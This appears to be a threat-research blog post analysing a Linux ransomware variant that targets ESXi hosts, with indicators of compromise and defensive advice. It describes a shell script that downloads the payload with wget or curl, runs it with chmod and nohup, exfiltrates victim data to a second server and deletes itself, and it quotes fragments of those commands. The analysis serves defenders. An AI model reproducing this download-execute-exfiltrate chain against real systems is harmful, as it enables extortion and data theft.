TargetCompany’s Linux Variant Targets ESXi Environments

In this blog entry, our researchers provide an analysis of TargetCompany ransomware’s Linux variant and how it targets VMware ESXi environments using new methods for payload delivery and execution.

Summary

  • The TargetCompany ransomware group is now employing a new Linux variant that uses a custom shell script as a means of payload delivery and execution, a technique not seen in previous variants.
  • The shell script also exfiltrates the victim’s information to two different servers so the ransomware actors have a backup of the information.
  • The Linux-based variant can determine whether the victim’s machine is running in a VMWare ESXi environment.
  • By targeting ESXi servers, the ransomware actors behind TargetCompany aim to disrupt operations more effectively and increase their chances of a ransom payout.
  • The TargetCompany affiliate linked to the ransomware sample points to a broader campaign that targets expansive IT systems.

Discovered in June 2021, The TargetCompany ransomware is tracked by Trend Micro as “Water Gatpanapun” and has a leak site under the name “Mallox.” We have observed that the group’s activity is highest in Taiwan, India, Thailand, and South Korea this year.

Since its discovery, TargetCompany has been evolving its techniques to circumvent security defenses employed by organizations; one such technique its use of a PowerShell script to bypass Antimalware Scan Interface (AMSI) and abuse of fully undetectable (FUD) obfuscator packers.

Recently, our threat hunting team discovered a new variant of the TargetCompany ransomware specifically targeting Linux environments. This variant uses a shell script for payload delivery and execution (Figure 1). 

Figure 1. The infection chain of TargetCompany’s Linux variant

Figure 1. The infection chain of TargetCompany’s Linux variant

This technique has not yet been observed in previous TargetCompany variants, indicating that the ransomware group has been continuously evolving to employ more sophisticated methods in its future attacks. This recently found Linux variant aligns with the recent trend of ransomware groups extending their attacks to critical Linux environments, thereby potentially increasing the range of target victims.

TargetCompany’s Linux variant

This latest variant checks whether the executable is running with administrative rights (Figure 2). Otherwise, it will not continue its malicious routine. This signifies that a compromised or vulnerable device was successfully exploited to gain administrative rights to execute the ransomware payload.

Figure 2. Checking if the program is executed as superuser or root

Figure 2. Checking if the program is executed as superuser or root

Exfiltration of sensitive victim information 

After its execution, it drops a text file named TargetInfo.txt that contains victim information, as shown in Figure 3. The contents of TargetInfo.txt will be sent to a command-and-control (C&C) server, hxxp://91[BLOCKED], with the file name ap.php (Figure 4). This behavior is similar to that of the ransomware’s Windows variant.

Figure 3. Dropped “TargetInfo.txt” file

Figure 3. Dropped “TargetInfo.txt” file

Figure 4. Disassembly of data exfiltration to a C&C server

Figure 4. Disassembly of data exfiltration to a C&C server

Targeting ESXi environments

The threat actors behind TargetCompany have widened their targets to include virtualization servers, aiming to cause more damage and operational disruption. They also added a capability to detect if the machine is running in a VMWare ESXi environment, a platform commonly used for hosting critical virtualized infrastructure in organizations (Figure 5). Encrypting critical ESXi servers could also increase the likelihood of successful ransom payments.

The binary performs a check by executing the command “uname” to determine whether the machine is running in a VMWare ESXi environment. 

Figure 5. Checking if running on ESXi environment

Figure 5. Checking if running on ESXi environment

If the system name matches “vmkernel”, this indicates that the machine is running in VMware’s ESXi hypervisor, and the binary enters “VM mode…” to encrypt files with the extensions in Figure 6.

Figure 6. VM-related extensions

Figure 6. VM-related extensions

File encryption and ransom note deployment

After its encryption routine, this variant appends the extension “.locked” on encrypted files and drops a ransom note named HOW TO DECRYPT.txt (Figure 7). This is a departure from the usual extension and ransom note file name of its Windows variant (Figure 8).

Figure 7. Appended “.locked” extension on encrypted files

Figure 7. Appended “.locked” extension on encrypted files

Figure 8. Ransom note

Figure 8. Ransom note

Execution of TargetCompany using a shell script

Upon further investigations, we found out that a shell script was used to download and execute the ransomware payload hosted in a designated URL. Figure 9 shows the custom-made shell script by the threat actors specifically to execute this TargetCompany variant. It first checks for the existence of the TargetInfo.txt file and terminates if found. 

Figure 9. Custom shell script for delivery and execution of payload

Figure 9. Custom shell script for delivery and execution of payload

The script attempts to download the TargetCompany payload from the download URL using “wget” or “curl,” whichever works between the two commands. The payload is then made executable using the command “chmod +x x” and executed in the background using “nohup ./x” (Figure 10). 

Figure 10. Code snippet for downloading and executing TargetCompany

Figure 10. Code snippet for downloading and executing TargetCompany

The custom shell script is also capable of exfiltrating data to a different server. Once the ransomware payload performs its malicious routine, the script will read the contents of the dropped text file TargetInfo.txt and upload it to another URL using “wget” or “curl”. 

Figure 11. Code snippet of data exfiltration to a C&C server

Figure 11. Code snippet of data exfiltration to a C&C server

This variant exfiltrates victim information to two different servers. It is possible that the implantation of this technique is part of TargetCompany threat actors’ strategy to improve redundancy and have a backup in case a server goes offline or is compromised.

After the ransomware performs its routine, the script deletes the TargetCompany payload using the command “rm -f x”.

This technique is very common, but it still poses significant challenge for defenders. Security practitioners will have limited artifacts to work with during investigation and incident response, thus making it difficult to understand the overall impact of the attack.

Infrastructure

The IP address used to deliver the payload and exfiltrate a victim’s system information has not yet been observed in previous TargetCompany campaigns. Based on research, this IP address is hosted by China Mobile Communications, an internet service provider (ISP) in China.

Since the IP address is hosted by a service provider, there is a possibility that the IP address used by TargetCompany’s threat actors was rented to host their malicious payload (Figure 12).

Figure 12. HTTPS certificate

Figure 12. HTTPS certificate

The certificate also was recently registered and is valid for only three months, indicating that it might be intended for short-term use. Upon visiting the IP address, we found the following homepage that is similar to the Tongda Xinke OA login interface (Figure 13).

Figure 13. Homepage of the URL used to host the ransomware payload

Figure 13. Homepage of the URL used to host the ransomware payload

Affiliate “vampire”

The specific sample shown in Figure 14 is associated with an affiliate called “vampire,” based on the contents it sends to its C&C server. This indicates broader campaigns involving high ransom demands and expansive IT system targeting. This affiliate is possibly connected to the affiliate included in a blog entry posted by Sekoia.

Figure 14. “Vampire”-related strings

Figure 14. “Vampire”-related strings

Conclusion

Malicious actors are consistently refining their attacks, as evidenced by the emergence of TargetCompany’s new Linux variant, which allows the ransomware to expand its pool of potential victims by targeting VMWare ESXi environments. In light of this, staying vigilant against emerging ransomware variants should remain paramount among defenders. Implementing tried-and-tested cybersecurity measures can mitigate the risk of falling victim to ransomware attempts and protect the data integrity of an organization’s assets. Organizations can implement best practices by:

  • Enabling multifactor authentication (MFA) to prevent attackers from performing lateral movement inside a network.
  • Adhering to the 3-2-1 rule when backing up important files — creating three backup copies on two different file formats, with one of the copies stored in a separate location
  • Patching and updating systems regularly; it’s important to keep operating systems and applications up to date and maintain patch management protocols that can deter malicious actors from exploiting any software vulnerabilities.

Trend Vision One™ hunting query

  • malName:*Linux.TARGETCOMP* AND eventName:MALWARE_DETECTION

Indicators of compromise (IOCs)

Hashes

Hash Detection Description
dffa99b9fe6e7d3e19afba38c9f7ec739581f656 Ransom.Linux.TARGETCOMP.YXEEQT TargetCompany Linux Variant
2b82b463dab61cd3d7765492d7b4a529b4618e57  Trojan.SH.TARGETCOMP.THEAGBD Shell Script
9779aa8eb4c6f9eb809ebf4646867b0ed38c97e1 Ransom.Win64.TARGETCOMP.YXECMT TargetCompany samples related to affiliate vampire  
3642996044cd85381b19f28a9ab6763e2bab653c Ransom.Win64.TARGETCOMP.YXECFT TargetCompany samples related to affiliate vampire  
4cdee339e038f5fc32dde8432dc3630afd4df8a2 Ransom.Win32.TARGETCOMP.SMYXCLAZ TargetCompany samples related to affiliate vampire  
0f6bea3ff11bb56c2daf4c5f5c5b2f1afd3d5098 Ransom.Win32.TARGETCOMP.SMYXCLAZ TargetCompany samples related to affiliate vampire  

URLs

URL Detection Description
hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh 90 – Untested Download URL of script
hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x 79 – Disease Vector Download URL of ransomware payload
hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/post.php 79 – Disease Vector Upload URL

MITRE ATT&CK tactics and techniques

Tactic Technique ID
Defense Evasion File Deletion T1070.004
Discovery System Information Discovery T1082
Execution Command and Scripting Interpreter: Unix Shell T1059.004
Command and Control Ingress Tool Transfer T1105
Exfiltration Exfiltration over Alternative Protocol T1408
Exfiltration over C2 Channel T1041
Impact Data Encrypted for Impact T1486

Source: Original Post